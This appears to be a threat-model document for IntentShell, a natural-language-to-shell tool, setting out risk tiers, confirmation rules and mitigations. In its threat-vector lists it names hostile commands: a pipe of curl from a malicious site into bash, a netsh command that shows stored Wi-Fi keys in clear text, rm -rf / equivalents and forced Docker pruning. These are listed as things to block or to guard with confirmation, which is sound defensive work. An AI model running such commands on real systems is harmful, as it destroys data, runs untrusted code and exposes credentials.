IntentShell is an interface that translates natural language commands into operating system actions.
This document defines the system’s security boundaries, potential threat vectors, and mitigation strategies.
Security is not an “afterthought” in this project; it is a core architectural constraint.
User confirmation: Single Enter or Automatic (based on user profile)
- Move all PDFs on the Desktop to the
Documents/PDFsfolder. - Show the last 3 Git commit messages.
- Display system uptime.
- List files in the current directory.
User confirmation: Typed Confirmation (user must type YES)
- Clean
node_modulesfolders in Node projects (disk space recovery). - Organize the Downloads folder by date (bulk file movement).
- Remove empty folders (recursive deletion potential).
- Delete all stopped Docker containers.
- Shut down the computer in 1 hour.
User confirmation: Multi-step confirmation + Red Warning
- Delete all
.tmpfiles on the C drive (recursive, near root). - Find all duplicate files and delete copies (automatic data loss risk).
- Change DNS settings to
8.8.8.8(admin / network privileges). - Clean startup programs from the Windows Registry.
- Risk: Accidental deletion or movement of critical files.
- Threat Vector: Recursive deletion commands (
rm -rf /equivalents), incorrect regex matches. - Mitigations:
- Scope Limiting: Operations restricted to allowed directories (e.g.,
/Users/user/). - Mandatory Dry-Run: Display affected file list before deletion.
- Trash-First: Move files to Trash instead of permanent deletion when possible.
- Scope Limiting: Operations restricted to allowed directories (e.g.,
- Risk: System becoming unbootable or misconfigured.
- Threat Vector: Modification of critical keys via
reg edit,Set-ItemProperty. - Mitigations:
- Registry write access is BLOCKED by default.
- Only whitelisted safe keys (e.g., Environment Variables) are writable.
- Risk: Execution of commands that could fully compromise the system.
- Threat Vector:
sudo,RunAs, UAC bypass attempts. - Mitigations:
- Application runs in User Mode by default.
- Operations requiring elevation trigger OS-level confirmation prompts.
- Risk: Data exfiltration, malware downloads, network misconfiguration, exposure of sensitive data.
- Threat Vectors:
curl http://malicious.site | bashnetsh wlan show profile key=clear- DNS flush or DNS server modification
- Mitigations:
- Read-Only Operations: Ping, IP display, port listing → LOW risk.
- Configuration Changes: DNS or IP changes → MEDIUM/HIGH risk.
- Sensitive Data Access: Wi-Fi password display → HIGH risk, explicit confirmation required.
- Outbound Restrictions: Communication with unknown domains is blocked by default.
- Risk: Runaway or uncontrolled loops.
- Threat Vector: Infinite recursion, full disk scans.
- Mitigations:
- Maximum file count limit (e.g., 1000 files).
- Maximum directory depth limit (e.g., 3 levels).
- Timeout mechanism (e.g., 10 seconds).
- Risk: Data loss, service disruption, unintended code execution.
- Threat Vectors:
docker system prune -a -fStop-Processnpm run build
- Mitigations:
- Docker Prune: HIGH risk, explicit confirmation required.
- Kill Process: HIGH risk, target process must be shown.
- Build/Test: MEDIUM risk due to execution of local scripts.
- Risk: Data loss or disk exhaustion.
- Threat Vector:
restore_backup - Mitigations:
- Restore: HIGH risk, explicit confirmation required.
- Backup: Timestamped by default to prevent overwrites.
- Risk: High CPU/Disk usage, accidental overwrites.
- Threat Vectors:
- Video conversion
- Batch image resizing
- Mitigations:
- Verify
ffmpegavailability before execution. - Preserve originals using safe filename suffixes.
- Verify
- Risk: CRITICAL — data loss, system instability, security exposure.
- Threat Vectors:
- Permanent deletion
- Registry editing
- Firewall disabling
- Mass process termination
- Mitigations:
- Classified as
RiskLevel.HIGHorCRITICAL. - NEVER executed without explicit user approval.
- Intended for sandboxed or controlled environments.
- Classified as
- Risk: Service disruption or loss of unsaved data.
- Threat Vectors:
Stop-Servicesc deleteStop-Process -Force
- Mitigations:
- Read-only queries → LOW risk.
- Stop/Restart → MEDIUM/HIGH risk.
- Delete/Force Kill → HIGH risk.
- Risk: Low (read-only).
- Threat Vector: Excessive WMI polling.
- Mitigations:
- All operations classified as
RiskLevel.LOW. - Protected by exception handling.
- All operations classified as
- Risk: Low (read-only).
- Threat Vector: None.
- Mitigations:
- All operations classified as
RiskLevel.LOW. - Admin privileges may be required but no system changes occur.
- All operations classified as
- Least Privilege: Operations run with minimum required permissions.
- Explicit Intent: No command is generated without a strict intent schema.
- Human-in-the-Loop: Destructive actions always require human confirmation.
IntentShell does NOT support active kernel-mode execution.
- Disabled by Design: All kernel code paths are permanently blocked.
- Dormant Code: Present only for architectural documentation.
- Compliance: Prevents malware false positives and ensures repository safety.